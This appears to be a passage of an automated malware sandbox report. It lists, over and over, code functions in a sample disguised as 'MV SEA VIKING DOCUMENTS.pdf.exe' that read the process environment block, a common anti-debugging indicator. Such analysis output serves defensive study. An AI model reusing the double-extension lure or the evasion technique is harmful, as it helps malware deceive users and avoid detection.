      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F8B mov eax, dword ptr fs:[00000030h]13_2_1F258F8B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F8B mov eax, dword ptr fs:[00000030h]13_2_1F258F8B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F8B mov eax, dword ptr fs:[00000030h]13_2_1F258F8B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FCFB0 mov eax, dword ptr fs:[00000030h]13_2_1F1FCFB0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FCFB0 mov eax, dword ptr fs:[00000030h]13_2_1F1FCFB0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D1FAA mov eax, dword ptr fs:[00000030h]13_2_1F1D1FAA
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1C9FD0 mov eax, dword ptr fs:[00000030h]13_2_1F1C9FD0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4FFF mov eax, dword ptr fs:[00000030h]13_2_1F2A4FFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBFC0 mov eax, dword ptr fs:[00000030h]13_2_1F1CBFC0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F8FFB mov eax, dword ptr fs:[00000030h]13_2_1F1F8FFB
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F251FC9 mov eax, dword ptr fs:[00000030h]13_2_1F251FC9
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov eax, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov eax, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov eax, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov ecx, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov eax, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FFDC mov eax, dword ptr fs:[00000030h]13_2_1F24FFDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28EFD3 mov eax, dword ptr fs:[00000030h]13_2_1F28EFD3
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBE18 mov ecx, dword ptr fs:[00000030h]13_2_1F1CBE18
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3E14 mov eax, dword ptr fs:[00000030h]13_2_1F1D3E14
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3E14 mov eax, dword ptr fs:[00000030h]13_2_1F1D3E14
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3E14 mov eax, dword ptr fs:[00000030h]13_2_1F1D3E14
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298E26 mov eax, dword ptr fs:[00000030h]13_2_1F298E26
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298E26 mov eax, dword ptr fs:[00000030h]13_2_1F298E26
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298E26 mov eax, dword ptr fs:[00000030h]13_2_1F298E26
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F298E26 mov eax, dword ptr fs:[00000030h]13_2_1F298E26
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F266E30 mov eax, dword ptr fs:[00000030h]13_2_1F266E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F266E30 mov eax, dword ptr fs:[00000030h]13_2_1F266E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov eax, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov ecx, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov eax, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov eax, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov eax, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F265E30 mov eax, dword ptr fs:[00000030h]13_2_1F265E30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D3E01 mov eax, dword ptr fs:[00000030h]13_2_1F1D3E01
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6E00 mov eax, dword ptr fs:[00000030h]13_2_1F1D6E00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6E00 mov eax, dword ptr fs:[00000030h]13_2_1F1D6E00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6E00 mov eax, dword ptr fs:[00000030h]13_2_1F1D6E00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D6E00 mov eax, dword ptr fs:[00000030h]13_2_1F1D6E00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20CE3F mov eax, dword ptr fs:[00000030h]13_2_1F20CE3F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4E03 mov eax, dword ptr fs:[00000030h]13_2_1F2A4E03
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2E32 mov eax, dword ptr fs:[00000030h]13_2_1F1D2E32
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F208E15 mov eax, dword ptr fs:[00000030h]13_2_1F208E15
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FE1F mov eax, dword ptr fs:[00000030h]13_2_1F24FE1F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FE1F mov eax, dword ptr fs:[00000030h]13_2_1F24FE1F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FE1F mov eax, dword ptr fs:[00000030h]13_2_1F24FE1F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FE1F mov eax, dword ptr fs:[00000030h]13_2_1F24FE1F
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280E6D mov eax, dword ptr fs:[00000030h]13_2_1F280E6D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4E62 mov eax, dword ptr fs:[00000030h]13_2_1F2A4E62
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28EE78 mov eax, dword ptr fs:[00000030h]13_2_1F28EE78
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20CE70 mov eax, dword ptr fs:[00000030h]13_2_1F20CE70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F207E71 mov eax, dword ptr fs:[00000030h]13_2_1F207E71
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FEE48 mov eax, dword ptr fs:[00000030h]13_2_1F1FEE48
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CDE45 mov eax, dword ptr fs:[00000030h]13_2_1F1CDE45
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CDE45 mov ecx, dword ptr fs:[00000030h]13_2_1F1CDE45
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CAE40 mov eax, dword ptr fs:[00000030h]13_2_1F1CAE40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CAE40 mov eax, dword ptr fs:[00000030h]13_2_1F1CAE40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CAE40 mov eax, dword ptr fs:[00000030h]13_2_1F1CAE40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CFE40 mov eax, dword ptr fs:[00000030h]13_2_1F1CFE40
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D1E70 mov eax, dword ptr fs:[00000030h]13_2_1F1D1E70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24DE50 mov eax, dword ptr fs:[00000030h]13_2_1F24DE50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24DE50 mov eax, dword ptr fs:[00000030h]13_2_1F24DE50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24DE50 mov ecx, dword ptr fs:[00000030h]13_2_1F24DE50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24DE50 mov eax, dword ptr fs:[00000030h]13_2_1F24DE50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24DE50 mov eax, dword ptr fs:[00000030h]13_2_1F24DE50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBE60 mov eax, dword ptr fs:[00000030h]13_2_1F1CBE60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBE60 mov eax, dword ptr fs:[00000030h]13_2_1F1CBE60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20CEA0 mov eax, dword ptr fs:[00000030h]13_2_1F20CEA0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F290EAD mov eax, dword ptr fs:[00000030h]13_2_1F290EAD
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F290EAD mov eax, dword ptr fs:[00000030h]13_2_1F290EAD
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAE89 mov eax, dword ptr fs:[00000030h]13_2_1F1FAE89
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAE89 mov eax, dword ptr fs:[00000030h]13_2_1F1FAE89
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F202EB8 mov eax, dword ptr fs:[00000030h]13_2_1F202EB8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F202EB8 mov eax, dword ptr fs:[00000030h]13_2_1F202EB8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FBE80 mov eax, dword ptr fs:[00000030h]13_2_1F1FBE80
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov eax, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov eax, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov eax, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov ecx, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E1EB2 mov eax, dword ptr fs:[00000030h]13_2_1F1E1EB2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F201EED mov eax, dword ptr fs:[00000030h]13_2_1F201EED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F201EED mov eax, dword ptr fs:[00000030h]13_2_1F201EED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F201EED mov eax, dword ptr fs:[00000030h]13_2_1F201EED
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28EEE7 mov eax, dword ptr fs:[00000030h]13_2_1F28EEE7
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F273EFC mov eax, dword ptr fs:[00000030h]13_2_1F273EFC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F257EC3 mov eax, dword ptr fs:[00000030h]13_2_1F257EC3
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F257EC3 mov ecx, dword ptr fs:[00000030h]13_2_1F257EC3
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CCEF0 mov eax, dword ptr fs:[00000030h]13_2_1F1CCEF0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BED0 mov eax, dword ptr fs:[00000030h]13_2_1F20BED0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2EE8 mov eax, dword ptr fs:[00000030h]13_2_1F1D2EE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2EE8 mov eax, dword ptr fs:[00000030h]13_2_1F1D2EE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2EE8 mov eax, dword ptr fs:[00000030h]13_2_1F1D2EE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D2EE8 mov eax, dword ptr fs:[00000030h]13_2_1F1D2EE8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25CED0 mov ecx, dword ptr fs:[00000030h]13_2_1F25CED0
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F211ED8 mov eax, dword ptr fs:[00000030h]13_2_1F211ED8
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F299ED2 mov eax, dword ptr fs:[00000030h]13_2_1F299ED2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A1D2E mov eax, dword ptr fs:[00000030h]13_2_1F2A1D2E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280D24 mov eax, dword ptr fs:[00000030h]13_2_1F280D24
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280D24 mov eax, dword ptr fs:[00000030h]13_2_1F280D24
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280D24 mov eax, dword ptr fs:[00000030h]13_2_1F280D24
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F280D24 mov eax, dword ptr fs:[00000030h]13_2_1F280D24
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FCD10 mov eax, dword ptr fs:[00000030h]13_2_1F1FCD10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FCD10 mov ecx, dword ptr fs:[00000030h]13_2_1F1FCD10
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1DAD00 mov eax, dword ptr fs:[00000030h]13_2_1F1DAD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1F0D01 mov eax, dword ptr fs:[00000030h]13_2_1F1F0D01
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28BD08 mov eax, dword ptr fs:[00000030h]13_2_1F28BD08
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28BD08 mov eax, dword ptr fs:[00000030h]13_2_1F28BD08
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25CD00 mov eax, dword ptr fs:[00000030h]13_2_1F25CD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F25CD00 mov eax, dword ptr fs:[00000030h]13_2_1F25CD00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F268D0A mov eax, dword ptr fs:[00000030h]13_2_1F268D0A
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CFD20 mov eax, dword ptr fs:[00000030h]13_2_1F1CFD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov ecx, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAD20 mov eax, dword ptr fs:[00000030h]13_2_1F1FAD20
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F255D60 mov eax, dword ptr fs:[00000030h]13_2_1F255D60
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D1D50 mov eax, dword ptr fs:[00000030h]13_2_1F1D1D50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D1D50 mov eax, dword ptr fs:[00000030h]13_2_1F1D1D50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A5D65 mov eax, dword ptr fs:[00000030h]13_2_1F2A5D65
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BD71 mov eax, dword ptr fs:[00000030h]13_2_1F20BD71
